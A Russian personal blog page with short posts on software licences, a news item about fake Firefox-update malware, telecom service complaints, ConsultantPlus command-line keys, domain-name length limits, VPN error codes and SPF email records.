ЗАКОНОДАТЕЛЬСТВОМ, ДАЖЕ ЕСЛИ КОМПЕНСАЦИЯ НЕ ПОКРЫВАЕТ ПОНЕСЕННЫЙ УЩЕРБ.




И, несмотря на это, мы этим пользуемся .... И соглашаются же все, а как не согласиться, если при отказе установка отменяется?

К чему я это? да вот, пост [livejournal.com profile] kotey_blackcat напомнил мне весь этот правовой беспредел :)
hroft_clone3: (Рыба)
Исследовательская компания Barkly Protects, занимающаяся вопросами информационной безопасности, обнаружила вирус, который маскируется под обновление для браузера Firefox, сообщается в исследовании.


Пользователи заражаются вирусом переходя по предложению скачать обновление для браузера Firefox со стороннего сайта. После установки компьютер заражается троянами, нарушающими работу системы, или же программами-вымогателями. Они блокируют доступ к компьютеру и требуют заплатить реальных денег для разблокировки.

Будьте внимательны — в обновлении для Firefox может содержаться вирус

Опасность данного вируса в том, что он имеет легальный сертификат. Большинство антивирусных программ не в состоянии обнаружить угрозу. Однако, как сообщила Barkly Protects, большинство компаний, разрабатывающих антивирусы, уже знают об опасности и в ближайшем обновлении они добавят вирус в реестры.

Hi-Tech.Mail.Ru не рекомендует скачивать обновление для браузера со сторонних незнакомых сайтов. Для этого в Firefox есть встроенная функция в меню. Иначе есть риск заразить свой компьютер вирусами.
©

Помнится, когда всё это начиналось, вирус в бутсекторе помещался ... дожили вирусня по 40 мегов полезла
hroft_clone3: (Рыба)
Блин, если-бы не то, что у нас очень долго фиксированные телефоны от МТС, и не то, что они в рекламе уже лет много, я бы отказался от этого монстра.
А теперь история.
Жили мы на одном адресе, там была оптика от МТС и канал Е1 в нем себя чувствовал себя прекрасно. Начался переезд №1. Заказали перенос канала Е1 на новый адрес. Канал переносили 2 месяца. Всё это время все важные входящие номера были переадресованы на 8-800, то есть, мы платили за все входящие.
Доделали работы и оптику в свои помещения, начался переезд №2. Опять перенос Е1. Три недели не могли перенести на существующую оптику, притом, что хозяин оптики в обоих местах один. У нас уже дедлайн. Требуем перенести к дате ..... Ставят временное решение по радиоканалу. За неделю канал работал нормально 2 дня, настраивался три дня. Пошел дождь и каналу настал почти трындец. Звоню менеджеру, мол когда будет на оптике..... Ответ меня сразил наповал - "а у нас опять начался процес согласования, через пару дней смогу сказать когда может быть произведено окончательное переключение.

БЛЯ, неужели еще месяц ждать и каждый час переподнимать канал руками?

Задрал уже этот МТС своей медлительностью. Коллеги, сделайте несколько перепостов, может там увидит руководство этот пост, если они мониторят ЖЖ. Естественно и в контактик кину это, и в мордокнигу ... надеюсь на ускорение работы этого тормоза.

PS. Бля, опять начался дождь. Опять начала рубиться связь. Достали.

hroft_clone3: (Рыба)
Примечание
Текст - цельнопёрт, я добавил только еще один ключ, который тут не упоминается



Обращаем Ваше внимание, что при выполнении любых операций с Информационным Банком необходимо указывать конкретное имя базы (ключ /base_xxx) либо применить выбранную операцию ко всем Информационным Банкам (ключ /base*). При использовании нескольких ключей их необходимо разделять пробелом.
Например, прием пополнения сетевой версией Системы КонсультантПлюс:
Версия Проф:
CONS.EXE /ADM /RECEIVE /BASE_LAW /YES

Обращаем Ваше внимание, что если Вы используете командный файл, например, для автоматизации процессов информационного обслуживания, в каждой его строке перед вызовом 32-разрядного приложения необходимо указывать команду
START /W
Например:
START /W CONS.EXE /QUEST /BASE* /YES
START /W CONS.EXE /ADM /RECEIVE /BASE* /YES

При запуске программы можно в командной строке использовать следующие параметры:

/ADM - режим администратора. Служит для выполнения операций с Информационным Банком сетевого варианта Системы, для регистрации рабочих станций сетевого варианта Системы;

/ANSWER - формирование пополнения по запросу;

/BASE_xxx - выбрать нужную базу по имени из файла baselist.cfg (например, base_quest);

/BASE* - выполнить базовую операцию (например, принять пополнение) со всеми Информационными Банками, включенными в файл baselist.cfg;

/BASETEST - проверить корректность Информационного Банка. В случае обнаружения ошибок в Информационном Банке будет произведено автоматическое удаление испорченных документов;

/BASETEST- - проверить корректность Информационного Банка. В случае обнаружения ошибок в Информационном Банке автоматического удаления испорченных документов не будет;

/CODEINFO - сформировать закодированный файл с информацией о РИЦ;

/COMMON_CD - позволяет работать с директорией COMMON, предварительно записанной на CD/DVD так, чтобы не строились объединенные словари на жестком диске. Работает только в несетевых комплектах;

/COMPRESS - сжать Информационный Банк (файлы *.DT?). Обращаем Ваше внимание, что файлы словарей *.nx? не сжимаются;

/GROUP - инсталляция рабочих станций (по этой команде создаются иконки КонсультантПлюс на рабочем столе и в меню Пуск, также можно указать локальную папку пользователя (по умолчанию эта папка C:\ConsUserData или C:\ConsRegionUserData для системы КонсультантПлюс Регионы);

/NOREINDEX0 - отказаться от формирования объединенных словарей (например, после принятия пополнения);

/NORUNNER - минимизировать бегунок при выполнении базовых операций (например, при приеме пополнения);

/MAKEQR - создать файлы запросов на регистрацию для всех ИБ комплекта. При сбросе параметров регистрации по этому ключу параметры однородных (с одним номером РИЦ) систем комплекта сбрасываются в единый файл CONS*.QR (название этого файла формируется по аналогии с CONS*.USR). Это позволяет надежнее регистрировать комплект при пересылке файлов *.QR по телекоммуникационным сетям.

/OFF - отключить всех работающих пользователей (например, для замены ИБ);

/QUEST - создать пакованный файл запроса - в каталоге SEND появится файл *.qst, в котором указано состояние Вашей базы - какие документы есть, каких нет. Программа, формирующая пополнение, обработав данный файл, точно создаст пополнение для Вашей базы, в результате которого Ваша база будет точно соответствовать эталону. Используется для адресного пополнения.

/QUEST+ - создать обычный файл запроса;

/RECEIVE - прием файлов пополнения (файлы помещаются в папку RECEIVE);

/RECEIVE_INET - прием файлов пополнения через интернет;

/RECEIVE_CD - автоприем пополнения с CD-ROM;

/RECEIVEDIR=<директория> - директория для файлов пополнения и *.usr;

/REINDEX - полностью переиндексировать Информационный Банк;

/REINDEXi - переиндексировать i-ю часть Информационного Банка;

/REINDEX0 - сформировать объединенные словари (файлы в директории \BASE\COMMON);

/REG - зарегистрировать Систему;

/SENDDIR=<директория> - директория для файлов запросов;

/SYSTEM – отображение дополнительной служебной информации в разделе "Статистика" и в карточке реквизитов.

/TEST - проверка исправности файлов cons.exe и vr*.res;

/USERSDIR=<директория> - директория для файлов статистики обработки запросов;

/USERNAME - получить сетевое имя пользователя. Результат помещается в файл USERNAME.TXT, формируемый в рабочей директории;

/USR - сформировать файлы *.usr;

/YES - "пакетный" режим работы с Системой;

/ZAP - обнулить Информационный Банк.

/REG* - функционал аналогичен ключу /REG за одним отличием - при обнаружении корректных (своих) файлов *.AR происходит принудительная перерегистрация, даже если комплект ранее и был уже зарегистрирован;

/73000 - подгрузить папки и закладки 7-й версии;

/BASEi - выбрать i-ю базу данных (/BASE1, /BASE2 ...) - используется в комбинации с другими ключами, указывает с какой базой производить операции. Параметр i - номер из файла base.cfg, под которым значится база или номер строки в окне "Выбор базы" при запуске программы. Существует особый вариант - BASE* - означает "все базы", прописанные в файле base.cfg - то есть все базы, которые Вы видите при запуске программы КонсультантПлюс в окне "Выбор базы";

/2000 - у каждого локального пользователя все настройки программы, окружение и временные файлы будут храниться в профиле локального пользователя;

/LOCALTMP - для ускорения процесса обновления флэш версии можно указав этот ключ, временные файлы создавать на жестком диске.

/ABOUT - создается файл *.txt в рабочей папке с информацией о системе - название системы, регистрационный номер, номер обслуживающего центра, версия программы.


hroft_clone3: (Рыба)
К вопросу о длинах имен доменов

Длина имени каждого домена (между разделительными точками) не может превышать 63 знака, общая же длина имени (включая имена субдоменов, разделительные точки и имя зоны) ограничена 255 знаками.

Минимальная длина доменного имени (без учета разделительных точек и имени зоны) принята равной 2.

Для зон SU, BIZ, INFO и DE — 3 символа.

Максимальная длина доменного имени согласно RFC 1035 составляет 63 символа. Многие реестры накладывают ограничения на минимальную длину - 3 символа, определенную RFC 1535.

Правила записи доменных имен.


В домене допустимы следующие символы:
Можно использовать буквы, цифры и «-» (дефис, минус), регистр символов значения не имеет.
Минимальная длина имени домена - 2 символа, максимальная — 255 символов (с точками и именем домена первого уровня).
Имя домена не может начинаться или заканчиваться на дефисы или содержать два дефиса подряд.

В именах доменов обычно используются латинские буквы.
В имени домена можно использовать и кириллицу, при переключении клавиатуры.

Имя домена состоит из нескольких частей, разделенных точкой:
Имя домена первого уровня — из одной части (ru, com и т.д.).
Имя домена второго уровня — из двух частей (antula.ru).
Имя домена третьего уровня — из трех частей (dir.antula.ru).


Длина каждой части не более 63 символов.

В RU-CENTER 16.05.08 зарегистрирован самый большой числовой домен Рунета, установивший новый рекорд Рунета.

Доменное имя состоит из 63-х девяток и выглядит следующим образом: 999999999999999999999999999999999999999999999999999999999999999.RU

Этот домен является самым большим из числовых имен, зарегистрированных в зоне RU. Из-за ограничений по максимальному количеству символов в домене (63 знака - для российской доменной зоны) большего числа в виде доменного имени в Рунете зарегистрировать нельзя. Любое другое число по своему значению будет меньше этого.



Это доменное имя закрывает дюжину самых длинных доменных имен в зоне RU.

"Топ-12" доменов Рунета:

GLEDENOV-POD-KAKIM-TI-NIKOM-SIDISH-NA-FORUME-DOMENFORUM-DOT-NET.RU
I-AM-DMITRY-MUKHACH-FROM-SPB-ICQ-3235555-SEARCH-WORK-IN-IT-TECH.RU
SAMOEDLINNOEDOMENNOEIMYAVRUSSKOMINTERNETEPRINADLEZHITERIELMEDIA.RU
SO-PLEASE-DO-NOT-ASK-ME-WHY-SOME-PEOPLE-WANT-TO-BE-BRAINDAMAGED.RU
YA-NA-SAMOM-PONTOVOM-SAYTE-V-RUSSKOMNETE-MOY-NOMER-POSLE-SLESHA.RU
YAPRISHELKTEBESPRIVETOMRASSKAZATCHTOSOLNCEVSTALODAJDENEGNAPIVKO.RU
MAXIMALNAYA-DLINA-DOMENNOGO-IMENI-NE-DOLZHNA-PREVYSHAT-63-BUKAF.RU
718281828459045235360287471352662497757247093699959574966967627.RU
141592653589793238462643383279502884197169399375105820974944592.RU
TAK-KHARLAMOV-VALENTIN-IZ-VORONEZHA-STAL-ZNAMENIT-VESEGO-ZA-600.RU
hroft_clone3: (Рыба)
Хочишь потроллить своих друзей - тебе сюда

Бесплатная почта тролля



http://abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com/

Регистрируем адрес - первые 63 цифры числа Пи
получаем адрес
314159265358979323846264338327950288419716939937510582097494459@abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com
шлём с него "с добрым утром" всем друзьям

Попробовал зарегаться. Выбрал максимальное количество цифр числа Пи, какое позволяет сервис ... и вот что получил :)

The username 31415926535897932384626433832795 is aready taken. Please choose another.
не я один такой идиот
Продолжаем - корень из двух
The username 14142135623730950488016887242096 is aready taken. Please choose another.

Корень мз 3
17320508075688772935274463415058
Получилось :)
Теперь у меня есть почтовый адрес
17320508075688772935274463415058abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk.com

hroft_clone3: (Рыба)
есть 2 АТС. У обоих статистика снимается с одного и того же порта.
Со своего компа захожу телнетом на этот порт нормально и вижу поток данных.
С сервера статистики на один захожу, а на другой не могу ... не организуется соединение, хоть ты тресни :)

Бля, ну как так может быть ....
hroft_clone3: (Рыба)
Если при запуске VPN-соединения возникла ошибка, то Вам необходимо запомнить ее трехзначный код. Ошибки имеющие код 6ХХ (ошибки, связанные с некорректным вводом пароля, имени или выбора типа протокола связи и говорят о том, что сеть работает, но необходимо проверить вводимые данные), 7ХХ (ошибки, связанные с некорректными настройками соединения и говорят о том, что сеть работает, но необходимо проверить настройки) или 8ХХ (ошибки, связанные с проблемами в настройке сети или отсутствием подключения к сети.

Установленное антивирусное программное обеспечение и, в особенности, брандмауэры могут блокировать установку VPN-соединения, вызывая, например, ошибки 789 и 792. В этом случае необходимо в настройках средств защиты разрешить UDP-порты 500 и 4500 для обмена данными с VPN-концентратором.



Источник ©

Статья большая и полезная, не буду ее сюда копипастить сейчас. Может, сделаю это как-нибудь позже.
hroft_clone3: (Рыба)

SPF запись для домена

Sender Policy Framework (SPF) — это расширение для протокола отправки электронной почты через SMTP.

Ссылка на официальный сайт — http://www.openspf.org/, а также на RFC 7208, в которой определено SPF https://tools.ietf.org/html/rfc7208.

Используя запись SPF можно определить подделан e-mail отправителя или является оригиналом.

Есть понятие e-mail спуфинга, которое означает маскировку одного объекта под другой объект. Следовательно IP-адрес отправителя можно подменить, а запись SPF запросто решает проблему с подменой адреса.

Создать SPF запись просто. Создание записи SPF заключается в формировании строки, текстовой записи для сервера доменных имен.

Строка содержит список серверов, которым позволено отправлять письма. Если письмо приходит от сервера, которого нет в списке, то письмо попадает в spam.

Агент, который принимает почту, например GMail, запрашивает SPF запись доменного имени и сверяет адрес отправителя со списком разрешенных адресов из DNS.

Строка для DNS с записью SPF должна состоять из ряда параметров.

Например:



  1. v=spf1 include:_spf.google.com ~all

v=spf1 означает версию протокола SPF.



После версии протокола SPF может идти ряд параметров. Например:

  • a;

  • mx;

  • include;

  • redirect;

  • all.

Параметры в записи могу комбинироваться.

Настройка SPF записи

Параметр "a" означает, что письма могут
приниматься, если отправка произошла с узла, который указан в записи "a"
доменного имени. В записи "a" обычные указывается IP-адрес, на котором
размещается ресурс.



Параметр "mx" указывает, что письма могут приниматься, если отправка
произошла с узла, который указан в записи "mx" доменного имени. В записи
"mx" обычные указывается почтовый сервис, который обрабатывает отправку
писем.



ip4:<ip-адрес> или ip6:<ip-адрес> указывает IP-адреса
дополнительных серверов, от которых можно принимать электронную почту,
соответственно "ip4" и "ip6" означает форматам адреса IP.



Параметр all задается в конце записи.



Параметр ~all указывает, что если все предыдущие правила не выполнены, то письма необходимо направить на тщательную проверку.



Параметр -all указывает, что если все предыдущие правила не выполнены, то письма необходимо отклонить.



Запись include указывает на то, с каких указанных хостов можно принимать
электронную почту, кроме прочих правил. Например,
include:_spf.google.com.



Запись redirect указывать на то, с каких указанных хостов требуется проверять SPF-запись. Например, redirect=_spf.mail.ru.



Как использовать на практике. Например, если есть сайт и электронная
почта на gmail.com или mail.ru и отправка почты происходит только с
gmail.com, или только с mail.ru, то можно прописать redirect с указанием
ссылки на сервис. Например, v=spf1 redirect=_spf.google.com. Таким
образом, вы оградите себя от рассылки конкурентов от вашего имени.



Множественное использование SPF-записей в DNS не рекомендуется,
поскольку все правила можно прописать одной строкой и несколько записей
могут привести к ошибке обработки.

Проверка SPF записи

Проверить SPF запись для доменного имени можно через обращение к DNS.



Например, можно использовать mxtoolbox.com/ или инструменты указанные на официальном сайте фреймворка по ссылке http://www.openspf.org/Tools.
Даже если вы не страдаете от спама, рассылаемого от имени вашего
домена, явное описание легальных источников почты из вашего домена может
помочь прохождению легальной почты от вас во входящие.



SPF-запись на DNS-сервере для владельца проекта является одним из
методов настройки безопасности, есть и альтернативные дополнительные
методы. Методы рекомендуется комбинировать. Например, рекомендуется
проверять IP-адрес перед размещением сайта на предмет наличия в
black-листе.



Рекомендованное чтиво по теме:


© цельноспёрто
hroft_clone3: (Рыба)
Бля, утро задалось ....
Скачек напряжения, сгорел стабилизатор на 5000 V/A, ИБП не справился, сгорел блок питания у АТС. Хорошо работаем, ебёна мать.

Profile

hroft_clone3: (Default)
hroft_clone3

April 2017

S M T W T F S
      1
2 3 45 6 78
910 11 12 13 14 15
16171819202122
23242526272829
30      

Syndicate

RSS Atom

Style Credit

Expand Cut Tags

No cut tags
Page generated Jul. 27th, 2017 04:34 am
Powered by Dreamwidth Studios